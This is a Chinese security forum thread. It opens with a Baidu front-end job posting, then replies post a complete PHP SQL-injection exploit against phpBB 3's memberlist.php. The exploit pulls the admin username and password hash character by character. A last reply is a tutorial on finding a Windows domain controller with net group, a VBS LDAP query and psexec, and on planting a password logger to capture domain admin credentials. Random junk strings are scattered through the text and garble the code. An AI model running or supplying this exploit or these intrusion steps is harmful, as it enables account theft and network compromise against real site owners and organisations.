返回列表 发帖

[招聘] 百度招聘Web前端研发工程师

  • 工作地点:北京
  • 工作年限:无要求
  • 招聘分类:前端工程师
  • 发布日期:2010/6/13
  • 截止时间:2010/12/31
  • 信息来自:Lion
职位描述-百度产品线Web端功能设计、开发和实现;5 o9 T0 L( z) y5 t# q  P3 h' D; y
-百度产品界面操作体验改进和性能优化;" X+ ?$ y$ l1 @1 B1 u
-Web前沿技术调研和积累 7 _! c) Y3 d7 |
# U* k( u4 _5 C3 Q0 f3 f1 `2 S  a8 `
职位要求-计算机及相关专业本科及以上学历;% v& X) D0 P7 @
-精通JavaScript、Ajax等Web开发技术;
4 L" b! i  D" l-精通HTML/XHTML、CSS等网页制作技术,熟悉页面架构和布局;) `' w/ i" K: f' B
-熟悉W3C标准,对表现与数据分离、Web语义化等有深刻理解;
" M7 O+ L7 |+ g, B) w) L. U$ [-熟练使用Linux系统,对算法、数据结构以及后台开发程序(PHP/Java等)有掌握;$ U. F" H" {% w* D% I, [& S
-对互联网产品和Web技术有强烈兴趣,有良好的学习能力和强烈的进取心;
7 q/ J+ w5 G# {+ x; c6 X- t-良好的沟通与表达能力、思路清晰,较强的动手能力与逻辑分析能力;
. Z4 k7 M# [; \- h) w2 f5 c. k5 ^: m  R" U& k
联系方式E-mail:stsr@baidu.com) s+ Z7 o0 x, W5 b0 w8 ?
(提示:为了更好的效果,建议在投递简历时注明来自博客园)
6 e. M2 z4 g) s6 N联系电话:86-10-5992 5418" [1 k  E! _9 {8 s3 U5 O( p
联系手机:13164234669
( c" e/ w+ F* `- P+ B/ r联系人:邹先生8 x# F4 M# h8 \/ g5 u2 o# y. N9 t
公司地址:北京市海淀区上地十街10号

 

您可能还想看的主题:

[HR]高级web研发工程师

[HR]web应用开发工程师

[HR]web安全工程师

安全宝招聘安全服务工程师

金山网络安全/开发工程师招聘

圣诞快乐。提前祝福

SpyEye 1.3.45 Loader源代码下载

知道创宇长期招聘Web安全研究员/Python Web研发工程师

北京某安全公司招聘WEB安全工程师

互动百科再告百度不正当竞争

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:悟空ing发表,本帖发表者悟空ing符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者悟空ing和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

真是‘望聘心叹’呀6 K, s$ E+ P& y: W

3 R0 g; j, G3 y1 c    俺学的真是杯具了   {:3_65:}

TOP

PHPBB 3.0 0day漏洞放出
#!/usr/bin/php -q -d short_open_tag=on
2 I" O/ N, Y7 O9 J' w<? , z& O' m  M9 j  g# _4 B
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure5 c* B+ t( ?/ ]- v' m6 i
"; ! n9 T" r. O! {) y' D* a! r
echo "by Hackerz5 hackerz5x@yahoo.com4 n4 @/ a1 q3 H6 L! j5 l8 y0 k
";
) \- H5 b4 X  o. J* t( becho "site: http://hackerz5.com& b5 h! l' Y  C# _- ^% z; R
"; ; `; H1 T. F- f
echo "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"
3 K, m0 C1 }& y0 N+ {- F- V4 ~6 H) o, [6 m! m5 T
"; ! D( N- }8 N5 @7 P9 J
/*   F5 L" F' c4 D. A! ]! D* c
works regardless of php.ini settings
% K' G- J. ~. _( l, K' L7 Q& l/ ~you need a global moderator account with "simple moderator" role
9 w  h) t& {, |( O  @0 u*/
* _0 \1 }' d9 ]! ~3 [if ($argc<5) { $ x. O. l' U2 M& @- Z! W  {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS
- [. H: v' ]1 K* W";
: e6 R6 k& z) i6 oecho "host: target server (ip/hostname)
" m9 P$ I' l( V";
6 l# X- v7 I4 l7 E' G6 {2 cecho "path: path to phpbb38 p" x. w" K/ P% d$ @- A/ g: z8 p
";
  g  J3 p7 o2 F6 Y0 F" B3 @echo "user/pass: u need a valid user account with global moderator rights) W$ o- N( ^% S" ]
";
$ i- `% S- g; A% {, t' s! kecho "Options:, q9 e' u3 b* k* P
";
, i) u. L7 o" N4 H; |echo " -T[prefix] specify a table prefix different from default (phpbb_)* K( `, c8 Y& d, ^
";
' i7 @- x# p8 ^" v* Q/ zecho " -p[port]: specify a port other than 80
) a/ ?! y! g4 i9 |" B1 I; m$ ]"; + N5 L, V. D; K: w9 ^) ]) ]
echo " -P[ip:port]: specify a proxy5 i" `# I4 u% e5 A; N
"; 5 K& S* K$ ?6 |' A9 Y1 L
echo " -u[number]: specify a user id other than 2 (admin)* J) ^' w2 j1 a  V
"; 6 t% |$ U2 K4 h! z/ D
echo " -x: disclose table prefix through error messages6 F, Z. _8 M2 s& P0 R
"; : x, ^# G. H6 Z+ @3 ]
echo "Example:
/ T3 }, G  \+ C! g"; 6 r# ^) `( E/ |4 F  b
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u
9 G0 ~4 e4 a2 q7 s$ k1 w+ B"; * H3 v% s$ B( [; @; ^
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7
1 j0 f6 K' z- @7 T0 |"; ; g# F5 Q& Q. @, r1 f+ s
die;
+ @3 G8 x/ i" [" ^* d- p& L} + s& \; X  }* I- L5 x
error_reporting(0);
5 A8 @/ _5 i0 l3 O/ R5 ]% Nini_set("max_execution_time",0); # S: {. k. K: c3 ^6 |+ Y
ini_set("default_socket_timeout",5); $ l4 R' s# B  X+ n& @8 s
function quick_dump($string)
. a: Q5 m$ B7 W/ `2 z0 k{
# [$ V0 [& n0 G  J$result='';$exa='';$cont=0;
  P% H8 ]- ?7 mfor ($i=0; $i<=strlen($string)-1; $i++) 2 A  u, ]! f* W/ m
{
- X2 j9 D( C$ t' |1 kif ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+ ]4 V2 E% c" g0 S0 L. n{$result.=" .";} - \1 J9 L- ]" Q* t$ H+ i! r
else ! r, U: ]& a" l" G, C
{$result.=" ".$string[$i];}
- g( ^5 K4 _( L4 ^+ `if (strlen(dechex(ord($string[$i])))==2)
6 S* P/ m! K8 ^% W6 W/ g9 i. X) s{$exa.=" ".dechex(ord($string[$i]));}
; a2 h% s# o* E9 G. X! \0 Y/ Telse ; d- E0 B/ p+ H3 d2 a/ E
{$exa.=" 0".dechex(ord($string[$i]));} ! C+ P8 _4 h! P% E' W; e9 n+ @* _
$cont++;if ($cont==15) {$cont=0; $result.="
4 W$ ~6 o' L& }"; $exa.="+ d* B: ~1 ]4 x# x2 T  j  k
";}
. H2 Z1 h- v: w4 ~& D} 3 x: @7 N5 t, T
return $exa."
2 M; @" T; j) A0 t4 H3 G".$result; : ?/ r" r- e( T: h, h+ a$ ?/ ~
} ( i8 {+ a% n1 [7 a1 U1 m: d
$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) ';   L/ M" Y3 j4 ?8 z3 ~
function sendpacketii($packet) 0 @: s% R. _) y
{ 2 O0 G/ f: T) H# A
global $proxy, $host, $port, $html, $proxy_regex;
, K# F7 K, t- H. n$ [9 C+ eif ($proxy=='') { ) m3 R4 V8 V$ k
$ock=fsockopen(gethostbyname($host),$port);
# q% S% w( P' @8 c7 ]8 Aif (!$ock) {
. \! l0 f4 L: m/ z7 X, J/ Y% h* q1 T4 Becho 'No response from '.$host.':'.$port; die;
2 G  U* n* v' F; E4 i" v$ Q4 v} 7 k' d% m2 i5 q; T7 g
}
% w* v1 a. ~3 ?+ S: S& g6 Y$ j& aelse { 2 e1 X( c6 o0 G
$c = preg_match($proxy_regex,$proxy);
- @+ k* N+ k& u8 X) S5 [/ u- T" A6 Z. uif (!$c) {
" e2 u  y+ z/ R$ eecho 'Not a valid proxy...';die; ' T1 X$ U! j8 b' r0 R
} 3 g- D4 a( k: @- q
$parts=explode(':',$proxy);
) R( {% S$ p/ \3 ^6 necho "Connecting to ".$parts[0].":".$parts[1]." proxy...+ X7 `. f: s6 W
"; , V# w  l2 e3 h/ X0 I3 S
$ock=fsockopen($parts[0],$parts[1]);
/ F) d/ O) Z- P! R0 z" R& n  uif (!$ock) {
; p1 w( ^, g9 c4 Mecho 'No response from proxy...';die; 4 b3 v( U; E) A% c6 Q& ^  v5 a
} & e% y9 b. j) e
} . N% P( G, {5 h9 R5 ?
fputs($ock,$packet);
* [/ ~+ z6 D$ lif ($proxy=='') { + R  k1 k- Z) G% _4 s# ?
$html=''; & }0 K7 E+ P5 e# j8 T; j
while (!feof($ock)) { ' i9 k/ o# E4 X( Y$ W8 L
$html.=fgets($ock);
1 \9 v$ _& f, E( Q3 X% G  s( W}
4 X& N' r. m- L* n. p3 W9 c} ! t; V8 q1 s' v) K+ r: s" \( Z
else { 5 l7 {, j7 b) r1 p5 z( |
$html='';
" L% ~4 f) M, {+ ~& @while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
& M2 s1 v% \/ J7 ?! @' h$html.=fread($ock,1);
. R* S$ M; ~4 L# \- {1 a5 P}
  U$ x/ n1 N8 _/ c: r5 G}
8 G1 o; L! u/ w- l3 C7 l9 P0 ^fclose($ock); ) E) Q  J2 }1 e9 _% {: A
#debug
* b$ p% _6 N6 F8 u3 }+ h! _#echo "1 c7 U4 U  p/ C) P8 c
".$html;
. \0 ~$ E5 f$ s7 n" H4 f} ( f' y. M5 ^* m6 j2 \* ^: @8 B& T8 }
$host=$argv[1]; ' m4 T5 X" g5 X% l2 U9 {$ G7 I
$path=$argv[2];
$ P4 Q1 a5 E4 d0 \. s$user=$argv[3]; 5 R% O# ]  r0 Y/ d- o
$pass=$argv[4];
9 p7 H5 S! Y' s0 r$port=80; : s6 Z8 m* D0 Y3 G2 Y
$prefix="PHPBB_";
$ p; e, D7 Y; J$ ^' A0 J! Z: Q$user_id="2";//admin 7 @" v8 G' A  g$ o
$discl=0; : O0 J% l; J! T* |  o+ y4 j8 \
$proxy="";
- o+ a/ r3 ]. f' j& n6 Rfor ($i=3; $i<=$argc-1; $i++){ & X) }- }. k8 a  c
$temp=$argv[$i][0].$argv[$i][1];
% o6 Y! a2 S" o0 k) o- X1 \1 i3 jif ($temp=="-p") # x( R/ R% U* G5 j( y- ~
{ & p' @: [9 ?, X. k: ~+ F
$port=str_replace("-p","",$argv[$i]); 4 b- O1 h8 \1 w* A9 N4 N5 D
}
7 |% o1 w' Q* _6 N; {" Z& O5 C( dif ($temp=="-P") + S+ K7 |. H0 ~1 `) `* v, [
{
. U9 m% i. N! k# y$proxy=str_replace("-P","",$argv[$i]); 0 T, A. |  D6 o; a" U
}
" I/ ^& |& y7 t! Y* d/ o7 W- iif ($temp=="-T") % ^# u+ X+ j1 D6 h+ ^/ O
{
8 ~# `7 n4 n. I$ d: b  j$prefix=str_replace("-T","",$argv[$i]); - h9 G1 `  s: F
} . B6 s: V  ^+ K5 b  W" r) z
if ($temp=="-u")
. [* N8 y/ G9 w" j6 L{
8 _/ O5 o5 `" \  T9 [; A7 C$user_id=str_replace("-u","",$argv[$i]);
( N. G" R& w7 Y! g0 }2 Q" }} - I9 U/ u& f' p" B! w  k
if ($temp=="-x")
( V1 r4 {/ [. |. }{
* E4 i* R2 f* Y+ i& u% y& b$discl=1; , ^8 V! T' j/ R$ }$ b- S& ]* k* U
}
% v2 @4 a" l' J0 C. ]3 [) g} + X) R+ c  ~" x
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} * c* q0 b9 W5 ^- }
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} & {! a, C7 H* M% V4 N/ G2 N
$data="username=".urlencode($user); / z; r( c- ?) O  Z( h" {' X
$data.="&amp;password=".urlencode($pass);
$ S8 k) d, o! c$data.="&amp;redirect=index.php";
- M6 ~; c4 b, g; a! `2 f* N9 S' ?7 k$data.="&amp;login=Login";
" r4 P- M5 W/ }  o+ l$packet="POST ".$p."ucp.php?mode=login HTTP/1.0
9 d8 I2 K$ h8 a& c";
- v. X; i- k0 c6 K  \$packet.="Referer: http://$host$path/ucp.php?mode=login. }) K4 K0 t' ]6 q, H2 V) J
";
" a7 H& Y2 V+ W( m2 D. M$packet.="Content-Type: application/x-www-form-urlencoded' ~2 L4 ?) g; K9 \, z$ W
";
- A) I; B! x6 S! n" s5 O; |- h/ r$packet.="Accept-Encoding: text/plain
( n5 d8 N0 V% |$ }( o1 D& b% U4 A; J";
5 i, `! M! ]( {% V$packet.="Host: ".$host."
% K7 F- P, q6 E. [' o) F";
2 |. ~6 |* C- ?0 H' b$packet.="Content-Length: ".strlen($data).". v( _2 Z/ z% z3 B" w" P7 j
";
" L( v$ t5 O: G$packet.="Connection: Close
8 [' C# Z* X  E! k+ s& X+ V! g- g
# X% k8 G( C) X5 V- j# y  C3 q: U"; / U0 J& U* }' \5 u  H4 }0 t
$packet.=$data;
( E: q8 N% e. T1 Dsendpacketii($packet);
- r, w+ |  A  [' G+ G2 Z$cookie="";
8 _, r* p' ~- p. {2 H# \$temp=explode("Set-Cookie: ",$html);
9 k+ i6 U+ q, }, v) Qfor ($i=1; $i<=count($temp)-1; $i++)
, O( P- S) |) s% K1 H! m0 ?' i{
& i& Q& w: W! {; T) k1 n1 @$temp2=explode(" ",$temp[$i]);
  [  l9 k8 _4 E2 l- k9 t+ n) K$cookie.=" ".$temp2[0];
7 V# {4 c  ?% i" [; @5 p} " D& J$ h. n" R9 u4 ^9 c
if (eregi("_u=1;",$cookie)) . d# h( x# E/ y8 h
{
- Y/ A) }  N$ P7 N& y  e//echo $html.". x8 a+ @; e7 t/ i
";//debug 5 p, O5 U/ {8 h5 H. T1 |
//die("Unable to login...");
7 D" l: O" \9 \+ Z7 O  j, P}
% w# }2 w$ P4 }* f2 techo "cookie -> ".$cookie."
6 _4 _/ T* k( n$ {# r7 V5 t"; , r5 w; `" l- L/ U* x
if ($discl)
) C+ Y$ G; G& l8 V0 V) X/ E{ 7 _! y6 W# q( t6 A
$sql="'suntzuuuuu";
# J7 X1 w- J' J4 B; p4 |+ jecho "sql -> ".$sql."2 P+ W) l. n" u# C
"; 0 p' {% m. D* a2 k9 R- a' H/ L
$sql=urlencode(strtoupper($sql));
, Z+ u3 c9 \" [" B$data="username="; 2 f& `& A: C( z; A, H: |' G
$data.="&amp;icq="; $ B( R2 q3 ?+ _3 J0 d$ _
$data.="&amp;email=";
# g" \: U" P- B4 J$data.="&amp;aim=";
% y& }+ a) f- Y$data.="&amp;joined_select=lt"; ! c  \$ g+ B: s
$data.="&amp;joined="; 3 a6 f% o* R1 t
$data.="&amp;yahoo=";
+ O; S# [+ F3 a$data.="&amp;active_select=lt";
' Z% q- N: ]8 o- |; y8 Y. u$data.="&amp;active=";
2 [  X3 g1 r; D8 S/ q8 s# H$data.="&amp;msn="; : S5 v& X0 t. l$ {# T% h( ~8 R
$data.="&amp;count_select=eq"; . C/ w. @7 I" H/ ~
$data.="&amp;count=";
8 @. u  E8 @4 `# t; u% I$data.="&amp;jabber="; 0 @2 i' r: J" P3 n; S. j
$data.="&amp;sk=c";
! }* Q& X  ?+ n1 ~! T; \$data.="&amp;sd=a";
2 E2 U; y, h7 a0 L2 X4 S$data.="&amp;ip=".$sql; 1 y* Z& P5 ?" V1 A0 ?
$data.="&amp;search_group_id=0"; 7 P$ P: u8 W5 @4 w
$data.="&amp;submit=Search";
" _* D( ]' ?+ O, a+ Z0 u$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
$ y' I4 F' I; x4 r; ?7 _"; 2 D5 H; h$ t& b: ?7 |
$packet.="Content-Type: application/x-www-form-urlencoded% ?- S3 ?  P+ k* s& @7 w" y& T
"; 4 Q1 s4 `$ T, ?! |$ ?8 G0 g) e
$packet.="Host: ".$host."
9 i3 L/ B1 ~4 Y"; 4 v$ z- c. n; A, t* R9 N
$packet.="Content-Length: ".strlen($data)."6 `9 [" H! {4 I- Z* D& _; _
";
% G: M0 U- b" [$packet.="Connection: Close
2 S: U/ P, \3 ~# k* L& H" Z";
3 K1 r: [1 Y7 y+ a6 Y) Q$packet.="Cookie: ".$cookie."
, F- N+ \5 I6 b* D* T6 Z; ]7 Q8 Y! E9 _) X9 ?- ]9 R* k, g
";
4 V0 k( G; ^9 X  Z5 c! D) e$packet.=$data;
4 k8 C0 E% A* Psendpacketii($packet); , w* D; E" M6 L6 ]* f, l
if (strstr($html,"You have an error in your SQL syntax"))
4 j. U1 h! d; f{
1 q8 Y! p. f4 o9 x, W0 e) g. C$temp=explode("posts",$html);
% o! }6 R1 t- M% F4 C( W6 ^$temp2=explode(" ",$temp[0]);
) v; w: H9 }$ [- q$prefix=strtoupper($temp2[count($temp2)-1]); 6 k& E7 q7 y0 V6 O: j8 K6 }9 x& a
echo "prefix -> ".$prefix."  a4 ^; Z0 F5 P0 Y& m  M
";sleep(2); " g/ C) F! Z$ l2 {7 V, v& J
} ( N4 W" N6 X1 A/ z
} & W# U0 b1 l: ^2 R
$md5s[0]=0;//null % P# ^1 D* a, X1 p
$md5s=array_merge($md5s,range(48,57)); //numbers
5 W$ _3 W. K8 {  `$md5s=array_merge($md5s,range(97,102));//a-f letters
( A# J- w/ K* K% w5 k( [$ r//print_r(array_values($md5s));
: m* ~3 h6 m: q1 a% Y$j=1;$password="";
3 ^/ {1 f" ~6 ~+ awhile (!strstr($password,chr(0))) . T% g' O' s" p7 n3 ~
{
& h+ O- Z8 H3 Efor ($i=0; $i<=255; $i++)
& r9 y' Q1 m1 L{
! K8 _) _: {7 [) Oif (in_array($i,$md5s))
# W# t9 V- P+ B8 Q" @" E  X{
; Y* }% ?; o' x0 a( d$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; ; I# v8 ^0 N2 H1 H, h8 x$ o
echo "sql -> ".$sql."; @% r& w- G, m
";
: S- ^1 V  B1 Z' j" X$sql=urlencode(strtoupper($sql)); - a. u7 {5 C2 z: M, U( S2 B: W
$data="username=";
. N8 z- Y8 ~' @* G4 f$data.="&amp;icq=";
8 P' ?/ S! c4 G8 Y0 `8 f, c$ M$data.="&amp;email=";
- g' }& t( J& A$data.="&amp;aim="; 4 i8 R4 H+ l# ]7 d9 x$ L
$data.="&amp;joined_select=lt"; 0 O/ z8 u) A. W$ o+ e3 ?; w! c
$data.="&amp;joined=";
0 C" I0 S: G& R+ ^! S7 E0 x$data.="&amp;yahoo=";
* A, X2 z2 H# f) l+ L8 i$data.="&amp;active_select=lt";
: R8 \# I  `3 n5 S: |) K$data.="&amp;active="; 0 x( M. ]9 `( j- Y! ?# B3 E' f
$data.="&amp;msn=";
6 B  J; k) y- A* _1 k+ D4 A$data.="&amp;count_select=eq";   B# l, ?, {8 q7 }. F* x; t: R
$data.="&amp;count=";
+ b6 b7 {+ }) {2 h6 a# z$data.="&amp;jabber=";
. k6 U7 O3 Q& A. f' n& O$data.="&amp;sk=c";
' ^' H5 k7 j2 W1 ~  D* R$data.="&amp;sd=a";
6 q  A( q/ P! G, m$data.="&amp;ip=".$sql;
+ L2 D- W' f& W8 E+ Q6 f$data.="&amp;search_group_id=0"; - h+ F0 w! K$ @0 i: b5 R7 b/ S
$data.="&amp;submit=Search";
- P% H& F/ ]7 v* T5 `" {$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0& s: {# s% \. ^0 r6 R8 p% ~! J
"; * v! ?. A7 F. M1 D
$packet.="Content-Type: application/x-www-form-urlencoded
, g3 T( h% |4 ?5 x- ~+ _1 n! N"; ) M' M5 |& R) r+ B2 o( ]
$packet.="Host: ".$host."0 B8 [* v, L2 f! Y% k/ ^
";
  W: w$ y1 @8 R0 q$packet.="Content-Length: ".strlen($data)."% [# h7 y( F" f' X/ _! k9 o& ?+ k
"; ( D0 q& ^4 I8 ^) d8 j6 I) {
$packet.="Connection: Close
1 n) e( r9 i% Y/ o% M9 w+ r4 ~"; $ i/ W' m: p+ E3 @! S
$packet.="Cookie: ".$cookie." ' t9 _1 u1 k# D2 b) k' Z

+ @% ~, e+ _, V4 L$ `& a";
! _, m" a% R1 N  c) k" t$packet.=$data;
4 y# p3 w8 K4 t3 Csendpacketii($packet);
% z% S0 y3 V  m- Q" d0 vif (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]3 J* }) V! z" F  i; L
";sleep(2);break;} 8 d: c8 b0 c& c: X; }( A) j! x- m2 M
} & p8 P. J9 i' _
if ($i==255) {die("Exploit failed...");}
, I% g: f: I7 p} 5 J8 z' S9 l7 i2 f# H
$j++;
! b' D; l6 H2 L. R4 d# ]1 B}
8 W+ ]2 L4 W' [$j=1;$admin=""; , F" M% v+ R0 j  @1 \
while (!strstr($admin,chr(0)))
( ]: \3 y4 N2 l" n* {) @5 @( h" y{
4 Y( P% K, G* {5 Y8 e% Cfor ($i=0; $i<=255; $i++)
5 {% h, }9 e  V' N+ J{
+ i% Y  a- _+ N/ T, ^$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; & s1 o* ~% }2 B( T" p% A0 ?2 G' K
echo "sql -> ".$sql."
4 F" t! s, L  H' a";
# N8 o7 P" S( Q8 j$ L  ?3 M3 y$sql=urlencode(strtoupper($sql));
+ I! h$ z4 F1 O0 a$data="username=";
/ U" m. q6 ?) i# y# F$data.="&amp;icq=";
- m+ Y4 e; w6 Z! J- [$data.="&amp;email=";
" ~& `* M/ n- `  f% K$data.="&amp;aim="; 4 L( ?* x# u, z& ]
$data.="&amp;joined_select=lt";
& g9 m- z- G" H3 |6 z( ]! i2 k$data.="&amp;joined="; ; E0 h! ]7 e( w* V
$data.="&amp;yahoo="; ( o0 Z/ H* z% P; M* I2 |+ y
$data.="&amp;active_select=lt";
% C$ o9 h/ T) ~$ @- d$data.="&amp;active=";
2 J& v0 W! H7 ~2 M, B% W5 t$data.="&amp;msn="; ( k3 a! ~1 I  w6 D" q% `
$data.="&amp;count_select=eq"; 3 J1 X! g2 E7 d4 j. \! S
$data.="&amp;count=";
6 H0 ~$ z0 W+ h, t7 e% _$data.="&amp;jabber=";
3 B* C6 W5 ?$ D+ w$data.="&amp;sk=c"; # O8 r7 [; i; [& P) k9 u
$data.="&amp;sd=a";
# w# X# }1 C' N$data.="&amp;ip=".$sql;
4 i9 N* _" G- n7 f8 N$data.="&amp;search_group_id=0";
) K$ H% T' z( E# e9 L* s% q$data.="&amp;submit=Search";
# ?* v, ^2 u; I$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0$ y0 E: r0 v2 Z- f( F
"; $ b( R/ p/ H% \5 q7 s
$packet.="Content-Type: application/x-www-form-urlencoded
7 H6 O0 A. |  t* w4 K";
' P% a  L, T6 j& B  \& ], r$packet.="Host: ".$host."
% a6 N  I0 ^$ X, t; M";   {8 o  a# s. P
$packet.="Content-Length: ".strlen($data)."2 w. P% A6 s% V! g% |; z4 F( c$ Q2 q
";
" i; }) s8 x4 j0 ~% X! j$packet.="Connection: Close, P* I7 |5 L0 v: B! v3 V5 L
";
2 C( ]$ p7 w; S: h) W  S+ \- [. Q+ k$packet.="Cookie: ".$cookie."
  H! x$ l0 F6 q1 ]* M% ]# P6 I, T& R- M/ R9 J
"; 4 {0 p) {5 G% {# E( I
$packet.=$data;
" b8 L1 |! o4 W* v1 t$ Asendpacketii($packet); " W& k/ Z& U0 m: t- _+ B
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]
# I2 G# D4 y6 q. v2 _  F";sleep(2);break;}
; \; v5 E5 I! J}
5 O. ~9 D% C& R5 e8 kif ($i==255) {die("Exploit failed...");} : n' K0 ]  D+ g- q. |
$j++; 0 n& }9 K4 M+ J
} ' J; r0 ], c. G1 f* w7 e* L9 }) j
echo "--------------------------------------------------------------------
5 ?3 M& I  [; o9 J) ^"; 3 D) l' F! T7 Z# h' Z. p" H4 u
echo "admin -> ".$admin."
6 ?' k1 ^6 t4 K" J  V1 v: \"; " G2 \- B- H5 s* Q- Q
echo "password (md5) -> ".$password."
6 H; ?( m! ~6 [% X3 A"; ! k& H7 z4 ^' U) L
echo "--------------------------------------------------------------------
7 I' L8 R7 l4 W# `";
4 K& Q* ]( X- c5 Y  [& ]; t) [! Nfunction is_hash($hash) 0 }1 T7 V) {0 w& `) g0 x2 s
{ 4 ]" L, h: d* v8 B) d
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
, v# p6 ?% [& @8 |% [0 Helse {return false;} 6 w4 G, Y! ~$ M0 g0 E2 q
} 1 P: k! a: ~8 L/ J  X+ U
if (is_hash($password)) {echo "Exploit succeeded...";} " P; J; R* S0 b1 H# E
else {echo "Exploit failed...";} - l% s# I( h% n: d8 t) }
?>. f, Q+ `" r3 V2 H" c3 v) ~7 @& B

: u; _0 h/ W5 B% v- u$ q( @8 z, @; |) Y) h
9 s% q3 a/ F9 B1 ^8 t! \

+ x" w" _8 U5 w. t: k, Q5 c5 D$ g- B9 Q! j3 n# O3 G9 Q: Z' Z1 c

4 a: F0 y" t& X) D* R3 B( A/ k! b. E$ \! T2 w6 E

0 Y0 Q6 n7 n2 v3 g8 U' a3 A3 A1 P' f( O& X
& H( q& A. v+ u; E+ x; h

* v) n6 K/ X0 h7 m5 `& X" z( ~/ A, [+ m" w8 G6 I' c

# g% y& F0 X6 j  M; p
6 u, T5 \( ?) \3 Q/ X7 J3 f, I- e! n7 E& ]( o2 O: _

! q7 ]! r1 i8 @! m  K$ k' v. o; V/ E8 O- A; ?
  W" k4 f: ^- R
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

找内网域主服务器方法
面对域结构的内网,可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码,整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上,如果能搞定其中的一台或几台,放个密码记录器之类,相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了,如何在成千台机器里判断出是哪一台呢?dos命令像●net group "domain admins" /domain●可以做为一个判断的标准,不过vbs也可以做到的,这仍然属于adsi部份的内容,代码如下: ★ set obj=GetObject("LDAP://rootDSE") wscript.echo obj.servername ★ 只用这两句代码就足够了,运行●cscript 3.vbs●,会有结果的。当然,无论是dos命令或vbs,你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码,你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell,或你的木马本来就是与桌面交互的,登陆你木马shell的又是域用户,就可以直接运行这些命令了。 vbs的在入侵中的作用当然不只这些,当然用js或其它工具也可以实现我上述代码的功能;不过这个专栏定下的题目是vbs在hacking中的妙用,所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目,争取为读者带来好的有用的文章4 S  Y8 ?5 A2 O/ D5 d
2 O9 N% Y) x: `3 x9 z# _

1 ?3 [# A! {4 r8 g, V* {  [& T" m  t$ B% n
9 `4 T8 _, S9 Y7 [: ?. f# W" U

8 V. Y! y  N( O# b7 p2 k" F& V' |! u

- }# U% g: N7 l$ A
) M3 z- Z6 I. [* R  _" l: W# r
* e& P( `3 b2 n1 e) ~; T# B& c- ~& x
3 g/ D. i/ L! G$ {. e/ a; |  Q2 s5 w* D
5 a2 S4 |- d( b/ [; D- j* a! b
0 u# S5 c$ {2 V3 {" L
6 `7 `$ l  ?  a- G$ ?: K/ E

' a5 _6 P# q& G3 \4 w# V7 |$ Z( \, C$ P& N
4 p2 P) @  F" ~& {+ f

, }6 f- @2 a3 G5 Q" k$ c/ Q4 x公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表